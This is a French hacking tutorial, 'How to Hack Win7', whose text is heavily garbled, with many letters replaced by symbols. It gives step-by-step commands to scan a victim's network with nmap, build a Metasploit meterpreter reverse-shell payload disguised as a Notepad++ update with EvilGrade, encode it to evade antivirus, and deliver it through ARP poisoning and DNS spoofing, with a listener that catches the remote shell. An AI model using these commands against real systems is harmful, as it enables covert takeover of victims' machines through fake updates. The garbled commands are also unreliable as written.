Tutoriel Backtrack

How to Hack Win7

Ralis par OLIVIER Thomas tudiant en Master Rseau et !curit In"ormati#ue a l$uni%ersit
&aris '(
)i%eau * mo+en, a%anc
Outils * Backtrack, )map, Metasploit, -irspoo", .nsspoo" , E%il/rade(
Les outils )map, Metasploit, -irspoo", .nsspoo" sont d01 prsents dans Backtrack, pour E%il/rade
il est disponi2le 1 cette adresse http*33www(in"o2+tesec(com3down3isr4e%il/rade4(5(5(tar(/6
Installation de E%il/rade *
Ou%rir un terminal
Tape6 les commandes *
tar 6%7" isr4e%il/rade4(5(5(tar(/6
cd isr4e%il/rade4(5(54tar(/63
(3e%il/rade
.ans ce tutoriel nous allons apprendre 1 utiliser E%il/rade pour in0ecter un pa+load metasploit dans
une 8 "ausse mise 1 0our 9 de notepad::
4Installe6 E%il/rade comme montrer ci4dessus(
!i l$erreur Can't locate Data/Dump.pm in @INC sur%ient utiliser la commande sui%ante :
cpan .ata**.ump puis recommence6 la commande (3e%il/rade
4;ne "ois E%il/rade installer, a%ant de commencer e""ectuons un scan a"in de trou%er l$adresse ip de
la %ictime ainsi #ue la %ersion de son s+st<me d$e7ploitation = laisser cette "en>tre de terminal
ou%erte , elle nous sera utile pour la suite du tutoriel?(
4&our e""ectuer un scan nous allons utiliser nmap
.ans notre e7emple notre rseau est @A(@BC(5(5(
4;tilisons donc la commande sui%ante *
nmap 4s! 4O 4T' @A(@BC(5(D
4Ici on e""ectue un scan "urti" =stealth !E) scan? sur toutes les machines du rseau @A(@BC(5(5, la
commande 4O permet d$acti%er la %isualisation du s+st<me d$e7ploitation et 4T' si/ni"ie la %itesse de
scan= ici T' est la %itesse ma7imale?(
4Lancer E%il/rade
&lace6 %ous dans le dossier d$E%il/rade et tappe6 (3e%il/rade
4;tilise6 la commande show modules dans la console E%il/rade, %ous de%e6 o2tenir une liste de
lo/iciels compati2le
.ans ce tutoriel nous allons utiliser l$outil )otepad::
4On tape donc la commande * con"i/ure notepadplus dans le terminal pour accder au module
notepad::(
- ce moment nous connaissons donc l$adresse ip de la %ictime, la %ersion de son s+st<me
d$e7ploitation ainsi #ue les ports ou%erts sur la machine(
Il est donc temps de con"i/urer notre a/ent pour crer un pa+load metasploit*
&our cela dans le terminal E%il/rade on utilise la commande sui%ante *
e%il/rade=notepadplus?Fset a/ent $GH3pentest3e7ploits3"rameworkI3ms"pa+load
windows3meterpreter3re%erseJtcp LHO!TK Lip %ictime L&ORTK portchoisi M F NOO;T
OF3tmp3notepadplus4%BBB(e7eNOO;TOFHP$
3pentest3e7ploits3"rameworkI3ms"pa+load permet de char/er ms"pa+load
windows3meterpreter3re%erseJtcp est le pa+load utilis permettra d$ou%rir une shell
meterpreter lors#uQon aura russi(
LHO!T est l$adresse I& de notre machine =de l$atta#uant ? et L&ORT est le port utilis pour
intera/ir a%ec notre %ictime lors#u$on aura russi notre opration(
4Vous pou%e6 aussi a"in de ne pas etre dtecter par l$anti%irus encoder %otre pa+load, un tutoriel est
disponi2le ici pour l$encoda/e a%ec ms"%enom(
4Vous pou%e6 donc crire set a/ent $GH3pentest3e7ploits3"rameworkI3ms"%enom 4p
windows3meterpreter3re%erseJtcp 4" raw 4e 7CB30mpJcallJadditi%e LHO!TK@A(@BC(5(
L&ORTK@IR M F NOO;TOF3tmp3notepadplus4%BBB(e7eNOO;TOFHP$ par e7emple(
On o2tient =ici la sortie du pa+load est 3root3.esktop3 ?*
4Tou0ours sur le terminal E%il/rade utilise6 la commande start
Vri"ie6 2ien #ue %otre port C5 est %ide(
)ous en a%ons "ini a%ec la partie con"i/uration de l$a/ent E%il/rade
Sontinuons a%ec la mise en place de l$atta#ue Man In The Middle =MITM?
4.ans cette partie nous allons utiliser l$atta#ue MITM a"in de spoo"er le .)! de l$adresse de mise 1
0our, plus simplement nous allons "aire croire a la machine de la %ictime #ue l$adresse de mise 1 0our
du lo/iciel est la nTtre au lieu de l$adresse relle(
4-%ant de commencer cette opration commenUons par acti%er le mode routa/e sur notre machine
en e""et elle n$est pas acti%er par d"aut pour cela tape6 echo @ F 3proc3s+s3net3ip%R3ipJ"orward
4;ne "ois ceci "ais crer un "ichier dns(t7t dans le repertoire de %otre choi7 =pense6 1 note6 le
chemin nous en aurons 2esoin ultrieurement? (
La con"i/uration de ce "ichier est la sui%ante *
Dip de redirection D D url de l$adresse a spoo"D
%otre Lip notepad4plus(source"or/e(net
4&assons maintenant 1 l$atta#ue MITM , ici nous allons utiliser deu7 outils arpspoo" et dnsspoo"(
4SommenUons par crer l$arp poisonin/, dans un terminal utiliser la commande sui%ante *
arpspoo" 4i %otreinter"ace 4t LipJ%ictime LipJpasserelle
4Ensuite dans un autre terminal rpter la commande en sens in%erse *
arpspoo" 4i %otreinter"ace 4t LipJpasserelle LipJ%ictime
4L$arp poisonin/ 1 commencer , il est temps de commencer le dns spoo"in/, lancer un nou%eau
terminal et utiliser dnsspoo" comme ceci *
dnsspoo" 4i %otreinter"ace 4" cheminJduJ"ichierJdns(t7t
Vous de%e6 donc o2tenir ces I "en>tres = ici les adresses mac sont e""aces ?
4Le "au7 ser%eur We2 est lanc par E%il/rade, notre -rp poisonin/ et notre .)! !poo" nous permet
de spoo"er l$adresse de mise 1 0our(
4;tilisons maintenant la commande ms"cli pour crer un ser%ice d$coute sur la machine(
4.ans une nou%elle console metasploit tappe6 *
ms"cli multi3handler &-ELO-.Kwindows3meterpreter3re%erseJtcp L&ORTK%otreportchoisi
LHO!TK%otre Lip
4Tout est termin, il ne reste plus #u$a attendre la mise 1 0our de l$application de %otre %ictime(
!i la %ictime accepte *
4Lors#ue %otre %ictime "ais sa mise 1 0our , /rVce au pa+load %ous %oila connecter sur sa machine(
S$est /a/nW
;n tutoriel de pri%il</e escalation est disponi2le 1 cette adresse pour o2tenir le ni%eau
-dministrateur(
Se tutoriel est en partie inspir par le tutoriel du 2lo/ de Monsieur Vishnu Valentino disponi2le a
l$adresse * http*33%ishnu%alentino(com3 =2lo/ #ue 0e %ous conseil "ortement *? ? W
La %ersion de notepad :: utilise pour ce tutoriel est la %ersion '(C(, il se peut #ue tout ne
"onctionne pas comme pr%u sur des %ersions plus rcentes(
&our connaXtre les %ersions supportes lise6 ce document(